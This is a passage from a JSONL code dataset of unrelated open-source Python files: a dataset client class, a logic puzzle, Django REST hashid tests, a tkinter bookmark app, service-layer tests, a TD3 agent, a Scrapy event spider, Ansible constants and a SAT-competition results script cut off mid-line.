darwin URL for the given ``DatasetItem``.\n\n Parameters\n ----------\n item : DatasetItem\n The ``DatasetItem`` for which we want the url.\n\n Returns\n -------\n str\n The url.\n \"\"\"\n\n @abstractmethod\n def 
post_comment(\n self, item: DatasetItem, text: str, x: float, y: float, w: float, h: float\n ) -> None:\n \"\"\"\n Adds a comment to an item in this dataset. The comment will be added with a bounding box.\n Creates the workflow for said item if necessary.\n\n Parameters\n ----------\n item : DatasetItem\n The ``DatasetItem`` which will receive the comment.\n text : str\n The text of the comment.\n x : float\n The x coordinate of the bounding box containing the comment.\n y : float\n The y coordinate of the bounding box containing the comment.\n w : float\n The width of the bounding box containing the comment.\n h : float\n The height of the bounding box containing the comment.\n \"\"\"\n\n @abstractmethod\n def import_annotation(self, item_id: ItemId, payload: Dict[str, Any]) -> None:\n \"\"\"\n Imports the annotation for the item with the given id.\n\n Parameters\n ----------\n item_id: ItemId\n Identifier of the Item that we are importing the annotation into.\n payload: Dict[str, Any]\n A dictionary with the annotation to import. The default format is:\n `{\"annotations\": serialized_annotations, \"overwrite\": \"false\"}`\n \"\"\"\n ...\n\n @property\n def remote_path(self) -> Path:\n \"\"\"Returns a URL specifying the location of the remote dataset.\"\"\"\n return Path(urljoin(self.client.base_url, f\"/datasets/{self.dataset_id}\"))\n\n @property\n def local_path(self) -> Path:\n \"\"\"Returns a Path to the local dataset.\"\"\"\n datasets_dir: str = self.client.get_datasets_dir(self.team)\n\n if self.slug:\n return Path(datasets_dir) / self.team / self.slug\n else:\n return Path(datasets_dir) / self.team\n\n @property\n def local_releases_path(self) -> Path:\n \"\"\"Returns a Path to the local dataset releases.\"\"\"\n return self.local_path / \"releases\"\n\n @property\n def local_images_path(self) -> Path:\n \"\"\"Returns a local Path to the images folder.\"\"\"\n return self.local_path / \"images\"\n\n @property\n def identifier(self) -> DatasetIdentifier:\n \"\"\"The ``DatasetIdentifier`` of this ``RemoteDataset``.\"\"\"\n return DatasetIdentifier(team_slug=self.team, dataset_slug=self.slug)\n","repo_name":"v7labs/darwin-py","sub_path":"darwin/dataset/remote_dataset.py","file_name":"remote_dataset.py","file_ext":"py","file_size_in_byte":33669,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"50"} +{"seq_id":"72869531676","text":"from logic import *\n\npeople = [\"Gilderoy\", \"Pomona\", \"Minerva\", \"Horace\"]\nhouses = [\"Gryffondor\", \"Poufssoufle\", \"Serpentard\", \"Serdaigle\"]\n\nsymbols = []\n\nknowledge = And()\n\nfor person in people:\n for house in houses:\n symbols.append(Symbol(f\"{person}{house}\"))\n\nfor person in people:\n knowledge.add(Or(\n Symbol(f\"{person}Gryffondor\"),\n Symbol(f\"{person}Poufssoufle\"),\n Symbol(f\"{person}Serpentard\"),\n Symbol(f\"{person}Serdaigle\")\n ))\n\n # Each person belongs to at most one house\nfor person in people:\n for h1 in houses:\n for h2 in houses:\n if h1 != h2:\n knowledge.add(\n Implication(Symbol(f\"{person}{h1}\"), Not(Symbol(f\"{person}{h2}\")))\n ) \n\n\n# Each house has only one person\nfor house in houses:\n for p1 in people:\n for p2 in people:\n if p1 != p2:\n knowledge.add(\n Implication(Symbol(f\"{p1}{house}\"), Not(Symbol(f\"{p2}{house}\")))\n )\n\nknowledge.add(\n Or(Symbol(\"GilderoyGryffondor\"),Symbol(\"GilderoySerdaigle\"))\n)\nknowledge.add(Not(Symbol(\"PomonaSerpentard\")))\nknowledge.add((Symbol(\"MinervaGryffondor\")))\n\n\nfor symbol in symbols:\n if 
model_check(knowledge,symbol):\n print(symbol)\n\n","repo_name":"hugomtr/CS50X-AI","sub_path":"Knowledge/knights/harry.py","file_name":"harry.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"28401879291","text":"\"\"\"pscp\"\"\"\r\ndef main():\r\n \"\"\"pscp\"\"\"\r\n sec = int(input())\r\n minu, sec = sec//60, sec%60\r\n hour, minu = minu//60, minu%60\r\n day, hour = hour//24, hour%24\r\n if day >= 10000:\r\n print(\"ERR_:__:__:__\")\r\n else:\r\n print(\"%04d:%02d:%02d:%02d\"%(day, hour, minu, sec))\r\nmain()\r\n","repo_name":"bess11234/pscp65","sub_path":"16 September 2022/Timing II.py","file_name":"Timing II.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"18263323166","text":"from unittest import skipUnless\n\nfrom django.core import exceptions\nfrom django.test import TestCase\n\nfrom tests.models import Artist, Record, Track\nimport hashids\n\ntry:\n from rest_framework.exceptions import ErrorDetail\n from rest_framework import serializers\n from rest_framework.renderers import JSONRenderer\n from hashid_field.rest import UnconfiguredHashidSerialField, HashidSerializerCharField, HashidSerializerIntegerField\n\n have_drf = True\nexcept ImportError:\n have_drf = False\n\n\n@skipUnless(have_drf, \"Requires Django REST Framework to be installed\")\nclass TestRestFramework(TestCase):\n def assertSerializerError(self, serializer, field, code):\n serializer_name = serializer.__class__.__name__\n self.assertFalse(serializer.is_valid(),\n msg=\"The serializer {} does not contain any errors\".format(serializer_name))\n\n def assertCodeInErrors(errors):\n found_error = False\n for error_detail in errors:\n if error_detail.code == code:\n found_error = True\n self.assertTrue(found_error,\n msg=\"The field '{} in serializer '{}' does not contain the error code {}\".format(\n field, serializer_name, code))\n\n if field:\n if field in serializer.errors:\n assertCodeInErrors(serializer.errors[field])\n else:\n self.fail(\"The field '{}' in serializer '{}' contains no errors\".format(field, serializer_name))\n else:\n if 'non_field_errors' in serializer.errors:\n assertCodeInErrors(serializer.errors['non_field_errors'])\n else:\n self.fail(\"The serializer '{}' does not contain the non-field error {}\".format(serializer_name, code))\n\n def test_default_modelserializer_field(self):\n class ArtistSerializer(serializers.ModelSerializer):\n class Meta:\n model = Artist\n fields = ('id', 'name')\n\n with self.assertRaises(exceptions.ImproperlyConfigured):\n ArtistSerializer().fields() # Fields aren't built until first accessed\n\n def test_modelserializer_charfield(self):\n class ArtistSerializer(serializers.ModelSerializer):\n id = HashidSerializerCharField(source_field='tests.Artist.id')\n\n class Meta:\n model = Artist\n fields = ('id', 'name')\n\n artist = Artist.objects.create(id=128, name=\"Test Artist\")\n orig_id = artist.id\n s = ArtistSerializer(artist)\n self.assertEqual(Artist._meta.get_field('id').salt, s.fields['id'].hashid_salt)\n self.assertTrue(isinstance(s.data['id'], str))\n self.assertEqual(artist.id.hashid, s.data['id'])\n s2 = ArtistSerializer(artist, data={'id': artist.id.hashid, 'name': \"Test Artist Changed\"})\n self.assertTrue(s2.is_valid())\n artist = s2.save()\n self.assertEqual(artist.id, orig_id)\n self.assertEqual(artist.name, \"Test Artist Changed\")\n\n def 
test_modelserializer_integerfield(self):\n class ArtistSerializer(serializers.ModelSerializer):\n id = HashidSerializerIntegerField(source_field=Artist._meta.get_field('id'))\n\n class Meta:\n model = Artist\n fields = ('id', 'name')\n\n artist = Artist.objects.create(id=256, name=\"Test Artist\")\n orig_id = artist.id\n s = ArtistSerializer(artist)\n self.assertTrue(isinstance(s.data['id'], int))\n self.assertEqual(artist.id.id, s.data['id'])\n s2 = ArtistSerializer(artist, data={'id': 256, 'name': \"Test Artist Changed\"})\n self.assertTrue(s2.is_valid())\n artist = s2.save()\n self.assertEqual(artist.id, orig_id)\n self.assertEqual(artist.name, \"Test Artist Changed\")\n\n def test_int_lookups_on_char_field(self):\n class RecordSerializer(serializers.ModelSerializer):\n id = HashidSerializerCharField(source_field='tests.Record.id')\n artist = serializers.PrimaryKeyRelatedField(\n pk_field=HashidSerializerCharField(source_field='tests.Artist.id'),\n queryset=Artist.objects.all(),\n required=False)\n reference_id = HashidSerializerCharField(source_field='tests.Record.reference_id')\n\n class Meta:\n model = Record\n fields = ('id', 'name', 'artist', 'reference_id')\n\n artist = Artist.objects.create(id=512, name=\"Test Artist 512\")\n reference_id = Record._meta.get_field('reference_id').get_hashid(1111111)\n\n # Make sure int lookups of a related field are not allowed on HashidSerializerCharField\n record_id = Record._meta.get_field('id').get_hashid(512)\n data = {\n 'id': record_id.hashid,\n 'name': \"Test Record 512\",\n 'artist': 512,\n 'reference_id': reference_id.hashid,\n }\n s = RecordSerializer(data=data)\n self.assertFalse(s.is_valid())\n self.assertSerializerError(s, 'artist', 'invalid_hashid')\n\n # Make sure lookups of a related field are allowed with hashid string and saving a new instance works\n data = {\n 'id': record_id.hashid,\n 'name': \"Test Record 512\",\n 'artist': artist.id.hashid,\n 'reference_id': reference_id.hashid,\n }\n s = RecordSerializer(data=data)\n self.assertTrue(s.is_valid())\n r512 = s.save()\n self.assertEqual(r512.id.hashid, record_id.hashid)\n self.assertEqual(r512.name, \"Test Record 512\")\n self.assertEqual(r512.artist, artist)\n\n # Make sure lookups of a related field are allowed even if the hashid looks like an integer\n # With the id 161051 on Artist.id, we get the hashid \"6966666\" which is all numerics\n artist = Artist.objects.create(id=161051, name=\"Test Artist 161051\")\n self.assertEqual(artist.id.hashid, \"6966666\")\n record_id = Record._meta.get_field('id').get_hashid(768)\n data = {\n 'id': record_id.hashid,\n 'name': \"Test Record 768\",\n 'artist': \"6966666\",\n 'reference_id': reference_id.hashid,\n }\n s = RecordSerializer(data=data)\n s.is_valid()\n self.assertTrue(s.is_valid())\n r768 = s.save()\n self.assertEqual(r768.id.hashid, record_id.hashid)\n self.assertEqual(r768.name, \"Test Record 768\")\n self.assertEqual(r768.artist, artist)\n\n def test_int_lookups_on_int_field(self):\n class RecordSerializer(serializers.ModelSerializer):\n id = HashidSerializerIntegerField(source_field='tests.Record.id')\n artist = serializers.PrimaryKeyRelatedField(\n pk_field=HashidSerializerIntegerField(source_field='tests.Artist.id'),\n queryset=Artist.objects.all(),\n required=False)\n reference_id = HashidSerializerIntegerField(source_field='tests.Record.reference_id')\n\n class Meta:\n model = Record\n fields = ('id', 'name', 'artist', 'reference_id')\n\n artist = Artist.objects.create(id=1024, name=\"Test Artist 1024\")\n\n # 
HashidSerializerIntegerField allows int lookups regardless of allow_int_lookup settings\n data = {\n 'id': 1024,\n 'name': \"Test Record 1024\",\n 'artist': 1024,\n 'reference_id': 2222222222,\n }\n s = RecordSerializer(data=data)\n self.assertTrue(s.is_valid())\n r512 = s.save()\n self.assertEqual(r512.id, 1024)\n self.assertEqual(r512.name, \"Test Record 1024\")\n self.assertEqual(r512.artist, artist)\n\n def test_invalid_source_field_strings(self):\n with self.assertRaises(ValueError):\n id = HashidSerializerIntegerField(source_field=\"tests\")\n with self.assertRaises(ValueError):\n id = HashidSerializerIntegerField(source_field=\"tests.Artist\")\n with self.assertRaises(ValueError):\n id = HashidSerializerIntegerField(source_field=\"Artist.id\")\n with self.assertRaises(LookupError):\n id = HashidSerializerIntegerField(source_field=\"foo.Bar.baz\")\n with self.assertRaises(LookupError):\n id = HashidSerializerIntegerField(source_field=\"tests.Bar.baz\")\n with self.assertRaises(exceptions.FieldDoesNotExist):\n id = HashidSerializerIntegerField(source_field=\"tests.Artist.baz\")\n\n def test_modelserializer_with_prefix(self):\n class TrackSerializer(serializers.ModelSerializer):\n id = HashidSerializerCharField(source_field=\"tests.Track.id\")\n\n class Meta:\n model = Track\n fields = (\"id\",)\n\n salt = Track._meta.get_field(\"id\").salt\n alphabet = Track._meta.get_field(\"id\").alphabet\n min_length = Track._meta.get_field(\"id\").min_length\n reference = hashids.Hashids(salt=salt, min_length=min_length, alphabet=alphabet)\n\n track = Track.objects.create()\n expected = 'albumtrack:' + reference.encode(1)\n self.assertEqual(track.id, expected)\n\n serializer = TrackSerializer(track)\n self.assertEqual(serializer.data[\"id\"], expected)\n","repo_name":"nshafer/django-hashid-field","sub_path":"tests/test_rest_framework.py","file_name":"test_rest_framework.py","file_ext":"py","file_size_in_byte":9295,"program_lang":"python","lang":"en","doc_type":"code","stars":357,"dataset":"github-code","pt":"50"} +{"seq_id":"72967982555","text":"import tkinter as tk\nimport webbrowser\n\n\ndef github(event):\n webbrowser.open_new_tab('https://github.com/cyberase')\n\n\ndef twitter(event):\n webbrowser.open_new_tab('https://twitter.com/cyberasee?t=gHzWF_z2INYqiiAhNXr-8w&s=09')\n\n\ndef instagram(event):\n webbrowser.open_new_tab('https://www.instagram.com/xappinez/')\n\n\nwindow = tk.Tk()\nwindow.geometry(\"350x220\")\nwindow.title(\"Social Media Bookmark App\")\n\nlabel1 = tk.Label(text=\"My Social Media\")\nlabel1.grid(column=0, row=0)\n\nbutton1 = tk.Button(window, text=\"GitHub\", bg=\"yellow\")\nbutton1.grid(column=1, row=1)\nbutton2 = tk.Button(window, text=\"Twitter\", bg=\"blue\")\nbutton2.grid(column=3, row=1)\nbutton3 = tk.Button(window, text=\"Instagram\", bg=\"pink\")\nbutton3.grid(column=5, row=1)\n\nbutton1.bind(\"\", github)\nbutton2.bind(\"\", twitter)\nbutton3.bind(\"\", instagram)\n\nwindow.mainloop()\n","repo_name":"cyberase/Social_Media_Bookmark_App","sub_path":"Social Media Bookmark App.py","file_name":"Social Media Bookmark App.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"6620863326","text":"import uuid\nfrom collections import defaultdict\nfrom datetime import datetime, timezone\n\nfrom slowking import bootstrap\nfrom slowking.adapters import notifications, repository\nfrom slowking.adapters.http import EigenClient, ProjectStruct\nfrom slowking.domain import commands, 
events, model\nfrom slowking.service_layer import unit_of_work\n\n\nclass FakeRepository(repository.AbstractRepository):\n def __init__(self, benchmarks):\n super().__init__()\n self._benchmarks = set(benchmarks)\n\n def _add(self, benchmark):\n # add a fake id to the benchmark\n benchmark.id = len(self._benchmarks) + 1\n self._benchmarks.add(benchmark)\n\n def _get_by_id(self, id):\n return next((b for b in self._benchmarks if b.id == id), None)\n\n def _get_by_name(self, name):\n return next((b for b in self._benchmarks if b.name == name), None)\n\n def _get_by_host_and_project_id(self, host: str, project_id: int):\n # implement if needed\n pass\n\n\nclass FakeUnitOfWork(unit_of_work.AbstractUnitOfWork):\n def __init__(self):\n self.benchmarks = FakeRepository([])\n self.committed = False\n self.flushed = False\n self.rolled_back = False\n\n def _commit(self):\n self.committed = True\n\n def _rollback(self):\n self.rolled_back = True\n\n def _flush(self):\n self.flushed = True\n\n def rollback(self):\n # delegate to _rollback; calling rollback() here would recurse forever\n self._rollback()\n\n\nclass FakeNotifications(notifications.AbstractNotifications):\n def __init__(self):\n self.sent = defaultdict(list)\n\n def send(self, benchmark: model.Benchmark, message: str):\n # use a hashable key; a list cannot be used as a dict key\n destination = \"test@example.com\"\n self.sent[destination].append(message)\n\n\nclass FakeClient(EigenClient):\n def __init__(self, *args, **kwargs):\n pass\n\n def create_project(self, *args, **kwargs):\n response = ProjectStruct(\n document_type_id=123,\n guid=str(uuid.uuid4()),\n name=\"test\",\n description=\"test\",\n created_at=datetime.now(tz=timezone.utc).isoformat(),\n language=\"en\",\n use_numerical_confidence_predictions=True,\n )\n return response\n\n\ndef bootstrap_test_app():\n return bootstrap.bootstrap(\n start_orm=False,\n uow=FakeUnitOfWork(),\n notifications=FakeNotifications(),\n publish=lambda *args: None,\n client=FakeClient,\n )\n\n\ndef test_create_benchmark():\n bus = bootstrap_test_app()\n bus.handle(\n commands.CreateBenchmark(\n channel=commands.CommandChannelEnum.CREATE_BENCHMARK,\n name=\"test\",\n benchmark_type=\"latency\",\n target_infra=\"k8s\",\n target_url=\"http://localhost:8080\",\n target_eigen_platform_version=\"0.0.1\",\n username=\"test\",\n password=\"secret_pw\",\n )\n )\n assert bus.uow.benchmarks.get_by_id(1) is not None\n assert bus.uow.committed # type: ignore\n\n\ndef test_create_project():\n bus = bootstrap_test_app()\n bus.handle(\n commands.CreateBenchmark(\n channel=commands.CommandChannelEnum.CREATE_BENCHMARK,\n name=\"test\",\n benchmark_type=\"latency\",\n target_infra=\"k8s\",\n target_url=\"http://localhost:8080\",\n target_eigen_platform_version=\"0.0.1\",\n username=\"test\",\n password=\"secret_pw\",\n )\n )\n benchmark = bus.uow.benchmarks.get_by_id(1)\n assert benchmark is not None\n\n bus.handle(events.BenchmarkCreated(benchmark_id=1))\n # this is the project id returned from the fake client\n assert benchmark.project.eigen_project_id == 123\n assert bus.uow.committed # type: ignore\n","repo_name":"sam-atkins/slowking","sub_path":"tests/integration/slowking/service_layer/test_handlers.py","file_name":"test_handlers.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10616726480","text":"import copy\nimport numpy as np\nfrom utils import soft_update\n\nimport torch\n\nfrom model import Actor, Critic\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nimport torch.nn.functional as F\n\n# 
Implementation of Twin Delayed Deep Deterministic Policy Gradients (TD3)\n# Paper: https://arxiv.org/abs/1802.09477\n\n\nclass TD3(object):\n def __init__(\n self, \n state_dim,\n action_dim,\n max_action,\n discount=0.99,\n tau=0.005,\n policy_noise=0.2,\n noise_clip=0.5,\n policy_freq=2\n ):\n\n # Set up Actor, actor target, and optimizer\n self.actor = Actor(state_dim, action_dim, max_action).to(device) #Step 1 pseudocode\n self.actor_target = copy.deepcopy(self.actor) #Step 2 Pseudocode\n self.actor_optimizer = torch.optim.Adam(self.actor.parameters(), lr=3e-4)\n\n # Set up Critic, critic target, and optimizer\n self.critic = Critic(state_dim, action_dim).to(device) #Step 1 pseudocode\n self.critic_target = copy.deepcopy(self.critic) #Step 2 Pseudocode\n self.critic_optimizer = torch.optim.Adam(self.critic.parameters(), lr=3e-4)\n\n #Set up hyper parameters\n self.max_action = max_action\n self.discount = discount\n self.tau = tau\n self.policy_noise = policy_noise\n self.noise_clip = noise_clip\n self.policy_freq = policy_freq\n\n self.total_it = 0\n\n\n def select_action(self, state):\n state = torch.FloatTensor(state.reshape(1, -1)).to(device)\n return self.actor(state).cpu().data.numpy().flatten()\n\n def train(self, replay_buffer, batch_size=256):\n self.total_it += 1\n\n #Sample replay buffer\n state, action, next_state, reward, not_done = replay_buffer.sample(batch_size) # Step 4.ii pseudocode\n\n with torch.no_grad():\n # Select action according to policy and add clipped noise\n # but clip the noise to keep the action close to original value\n noise = ( \n torch.randn_like(action) * self.policy_noise\n ).clamp(-self.noise_clip, self.noise_clip) # Step 4.iii pseudocode\n\n\n #paper doesn't say to do this but clamping to the max possible action\n #prevents noise from going over the max\n next_action = (\n self.actor_target(next_state) + noise\n ).clamp(-self.max_action, self.max_action) # Step 4.iii pseudocode\n\n #Compute the target Q value; not_done masks out the bootstrap term at episode ends\n target_Q1, target_Q2 = self.critic_target(next_state, next_action) # Step 4.iv pseudocode\n target_Q = torch.min(target_Q1, target_Q2) # Step 4.iv pseudocode\n target_Q = reward + not_done * self.discount * target_Q # Step 4.iv pseudocode\n\n\n #Get current Q estimate\n current_Q1, current_Q2 = self.critic(state, action) # Step 4.v pseudocode\n\n #Compute critic loss\n critic_loss = F.mse_loss(current_Q1, target_Q) + F.mse_loss(current_Q2, target_Q) # Step 4.v pseudocode\n\n #Optimize the critic\n self.critic_optimizer.zero_grad() # Step 4.v pseudocode\n critic_loss.backward() # Step 4.v pseudocode\n self.critic_optimizer.step() # Step 4.v pseudocode\n\n #Delayed policy updates\n if self.total_it % self.policy_freq == 0: # Step 4.vi\n\n #Compute actor loss\n actor_loss = -self.critic.Q1(state, self.actor(state)).mean() # Step 4.vi.a\n\n # Optimize the actor\n self.actor_optimizer.zero_grad() # Step 4.vi.a\n actor_loss.backward() # Step 4.vi.a\n self.actor_optimizer.step() # Step 4.vi.a\n\n\n #Update the frozen target models\n soft_update(self.critic_target, self.critic, self.tau) # Step 4.vi.b of pseudocode the first one \n soft_update(self.actor_target, self.actor, self.tau) # Step 4.vi.b of pseudocode the second one\n\n\n #Save the actor and critic and their optimizers\n def save(self, filename):\n torch.save(self.critic.state_dict(), filename + \"_critic\")\n torch.save(self.critic_optimizer.state_dict(), filename + \"_critic_optimizer\")\n\n torch.save(self.actor.state_dict(), filename + \"_actor\")\n 
torch.save(self.actor_optimizer.state_dict(), filename + \"_actor_optimizer\")\n\n #Load the actor and critic and their optimizers\n def load(self, filename, evaluate=True):\n self.critic.load_state_dict(torch.load(filename + \"_critic\"))\n self.critic_optimizer.load_state_dict(torch.load(filename + \"_critic_optimizer\"))\n self.critic_target = copy.deepcopy(self.critic)\n\n self.actor.load_state_dict(torch.load(filename + \"_actor\"))\n self.actor_optimizer.load_state_dict(torch.load(filename + \"_actor_optimizer\"))\n self.actor_target = copy.deepcopy(self.actor)\n\n if evaluate:\n self.critic.eval()\n self.critic_target.eval()\n self.actor.eval()\n self.actor_target.eval()\n\n else:\n self.critic.train()\n self.critic_target.train()\n self.actor.train()\n self.actor_target.train()\n","repo_name":"ChadMcintire/TD3","sub_path":"TD3_example/TD3.py","file_name":"TD3.py","file_ext":"py","file_size_in_byte":5246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"42150778715","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nSpider module for crawling alibi.com\n\"\"\"\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\n\nfrom activitiesin.items import ActivitiesinItem\nimport sys\n\nclass AlibiSpider(BaseSpider):\n \"\"\"\n Spider for crawling alibi.com\n \"\"\"\n name = \"alibi\"\n allowed_domains = [\"alibi.com\"]\n start_urls = [\n \"http://alibi.com/events/searchresult.html?com=searchresult&t=2\", #music\n #\"http://alibi.com/events/searchresult.html?com=searchresult&t=8\", # word\n #\"http://alibi.com/events/searchresult.html?com=searchresult&t=7\", # art\n #\"http://alibi.com/events/searchresult.html?com=searchresult&t=9\", # stage\n #\"http://alibi.com/events/searchresult.html?com=searchresult&t=18\", # stage\n #\"http://alibi.com/events/searchresult.html?com=searchresult&t=11\", # song and dance\n #\"http://alibi.com/events/searchresult.html?com=searchresult&t=4\" # community\n ]\n\n def parse(self, response):\n \"\"\"\n hxs = HtmlXPathSelector(response)\n sites = hxs.select('//ul/li')\n items = []\n for site in sites:\n item = DmozItem()\n item['title'] = site.select('a/text()').extract()\n item['link'] = site.select('a/@href').extract()\n item['desc'] = site.select('text()').extract()\n items.append(item)\n \"\"\"\n hxs = HtmlXPathSelector(response)\n searchresults = hxs.select('//section[@id=\"searchresult\"]')\n dates = searchresults.select('.//header[@class=\\\n \"eventdates\"]/text()').extract()\n events = searchresults.select('.//ul[@class=\"events\"]')\n items = []\n category = events[0].select('.//a[@itemprop=\"eventType\"]/text()')\\\n .extract()[0]\n for i in xrange(len(dates)):\n current_venue = -1\n venue = \"\"\n for event in events[i].select(\"li\"):\n location = event.select('.//div/text()').extract()\n\n try:\n item = ActivitiesinItem()\n if len(location):\n venue = location[0]\n info = event.select('a[@class=\"summary\"]/text()')\\\n .extract()[0].split(u'•')\n item['activity'] = info[0]\n item['location'] = venue\n item['date'] = dates[i]\n\n item['time'] = event.select('.//abbr[\\\n @class=\"value\"]/text()').extract()\n\n item['time'] = item['time'][0]\n\n item['link'] = \"\"\n item['category'] = category\n\n if len(info) > 1:\n item['description'] = info[1]\n else:\n item['description'] = ''\n\n items.append(item)\n except:\n pass\n\n return items\n \"\"\"\n category = \"\"\n for evts in events.select('.//div[@class=\"event_category\"]/ \\\n 
ul/li/a[@itemprop=\"eventType\"]/text()') \\\n .extract():\n print evts\n \"\"\"\n # Steps\n # 1. Grab a link to the category\n # 2. visit that link\n # 3. parse that link and store all items\n\n","repo_name":"jdelgad/activitiesin","sub_path":"activitiesin/spiders/alibi_spider.py","file_name":"alibi_spider.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"42766638079","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nDOCUMENTATION = r'''\nauthor: Sacha Boudjema (@sachaboudjema)\nshort_description: Value sets to be used as argspec choices.\nversion_added: \"2.9\"\n'''\n\n\nclass EntityStatusChoices:\n CHOICES = (\n 'Enabled',\n 'Disabled'\n )\n ENABLED = 'Enabled'\n DISABLED = 'Disabled'\n\n\nclass MatchChoices:\n CHOICES = (\n 'equals',\n 'notequals',\n 'contains',\n 'icontains',\n 'belongsto',\n )\n EQUALS = 'equals'\n NOT_EQUALS = 'notequals'\n CONTAINS = 'contains'\n ICONTAINS = 'icontains'\n BELONGS_TO = 'belongsto'\n\n\nclass EntityChoices:\n CHOICES = (\n 'Service',\n 'AuthMethod',\n 'AuthSource',\n 'LocalUser',\n 'Endpoint',\n 'StaticHostList',\n 'Role',\n 'RoleMapping',\n 'PostureInternal',\n 'PostureExternal',\n 'AuditPosture',\n 'EnforcementPolicy',\n 'EnforcementProfile',\n 'NadClient',\n 'NadGroup',\n 'ProxyTarget',\n 'Simulation',\n 'AdminUser',\n 'AdminPrivileges',\n 'ServerConfig',\n 'SnmpTrapConfig',\n 'ExtSyslog',\n 'DataFilter',\n 'SyslogExportData',\n 'ContextServer',\n 'ContextServerAction',\n 'RADIUS Dictionary',\n 'PostureDictionary',\n 'TacacsServiceDictionary',\n 'TagDictionary',\n 'TagDefinition',\n 'GuestUser',\n 'OnboardDevice',\n )\n SERVICE = 'Service'\n AUTH_METHOD = 'AuthMethod'\n AUTH_SOURCE = 'AuthSource'\n LOCAL_USER = 'LocalUser'\n ENDPOINT = 'Endpoint'\n STATIC_HOSTLIST = 'StaticHostList'\n ROLE = 'Role'\n ROLE_MAPPING = 'RoleMapping'\n POSTURE_INTERNAL = 'PostureInternal'\n POSTURE_EXTERNAL = 'PostureExternal'\n AUDIT_POSTURE = 'AuditPosture'\n ENF_POLICY = 'EnforcementPolicy'\n ENF_PROFILE = 'EnforcementProfile'\n NAD_CLIENT = 'NadClient'\n NAD_GROUP = 'NadGroup'\n PROXY_TARGET = 'ProxyTarget'\n SIMULATION = 'Simulation'\n ADMIN_USER = 'AdminUser'\n ADMIN_PRIVILEGES = 'AdminPrivileges'\n SERVER_CONFIG = 'ServerConfig'\n SNMP_TRAP_CONFIG = 'SnmpTrapConfig'\n EXT_SYSLOG = 'ExtSyslog'\n DATA_FILTER = 'DataFilter'\n SYSLOG_EXPORT_DATA = 'SyslogExportData'\n CONTEXT_SERVER = 'ContextServer'\n CONTEXT_SERVER_ACTION = 'ContextServerAction'\n RADIUS_DICT = 'RADIUS Dictionary'\n POSTURE_DICT = 'PostureDictionary'\n TACACS_DICT = 'TacacsServiceDictionary'\n TAG_DICT = 'TagDictionary'\n TAG_DEF = 'TagDefinition'\n GUEST_USER = 'GuestUser'\n ONBOARD_DEVICE = 'OnboardDevice'\n","repo_name":"Automation-Architech/ansible-collection-tipsconfig","sub_path":"plugins/module_utils/choices.py","file_name":"choices.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9814651868","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\n\ndef pl(args):\n for e in args:\n print(\"- \" + e)\n\n\ndef getVbs(outputAllSolvers=True, removePlanning=False):\n pResults = \"../../downloads/results.csv\"\n pNames = \"../solver_names_final.txt\"\n\n d = pd.read_csv(pResults)\n d[\"n\"] = d[\"solver\"] + \"__\" + d[\"configuration\"]\n o = d\n print(\"\\n\" + str(len(o.n.unique())) + \" original solvers\")\n\n # withdrawn\n withdrawn = 
d[d[\"solver\"] == \"Relaxed_LCMDCBDL_noTimePara\"].n.unique()\n d = d[~d[\"n\"].isin(withdrawn)]\n print(\"Removed withdrawn solver:\")\n pl(withdrawn)\n\n # disqualified\n dis = d[d[\"verifier-result\"].isin([\"SAT-INCORRECT\", \"UNSAT-INCORRECT\"])][\n \"n\"\n ].unique()\n d = d[~d[\"n\"].isin(dis)]\n print(\"Removed disqualified solver:\")\n pl(dis)\n\n # competed in no limits\n np = d[d[\"drat\"] == \"NOPROOF\"][\"n\"].unique()\n d = d[~d[\"n\"].isin(np)]\n print(\"Removed NoLimits solver:\")\n pl(np)\n\n # demoted to no limits\n dem = d[d[\"drat\"] == \"NOT_VERIFIED\"][\"n\"].unique()\n d = d[~d[\"n\"].isin(dem)]\n print(\"Removed demoted solver:\")\n pl(dem)\n\n solverInMain = len(d[\"n\"].unique())\n print(str(solverInMain) + \" solvers participated in main track\")\n\n d = d.set_index([\"n\", \"benchmark\"])\n s = d[d[\"result\"].isin([\"SAT\", \"UNSAT\"])]\n print(str(len(s.reset_index().benchmark.unique())) + \" benchmarks have been solved\")\n vbsRows = s.groupby(\"benchmark\").time.idxmin()\n\n if outputAllSolvers:\n d = o.set_index([\"n\", \"benchmark\"])\n\n d[\"VBS_Origin\"] = False\n d.loc[vbsRows, \"VBS_Origin\"] = True\n d = d.reset_index()\n\n # adding short names\n nameDict = pd.read_csv(pNames, sep=\" \", names=[\"n\", \"name\"])\n nameDict[\"name\"] = nameDict[\"name\"].str.replace(\"\\\\\", \"\")\n d = d.merge(nameDict, on=\"n\", how=\"left\")\n d[\"name\"] = d[\"name\"].fillna(\"UNDEF\")\n\n v = d[d[\"VBS_Origin\"]].copy()\n v[\"VBS_Origin\"] = False\n v[\"n\"] = v[\"name\"] = v[\"solver\"] = \"VBS\"\n v[\"configuration\"] = \"default\"\n d = d.append(v)\n\n if removePlanning:\n print(\"removed \" + str(len(d[d[\"benchmark\"].apply(lambda x: \"ddl_\" in x)].benchmark.unique())) + \" planning bechmarks\")\n d = d[~d[\"benchmark\"].apply(lambda x: \"ddl_\" in x)]\n print(str(len(d[d.result.isin([\"SAT\", \"UNSAT\"])].benchmark.unique())) + \" solved benchmarks are left\")\n d = d.drop(\"n\", 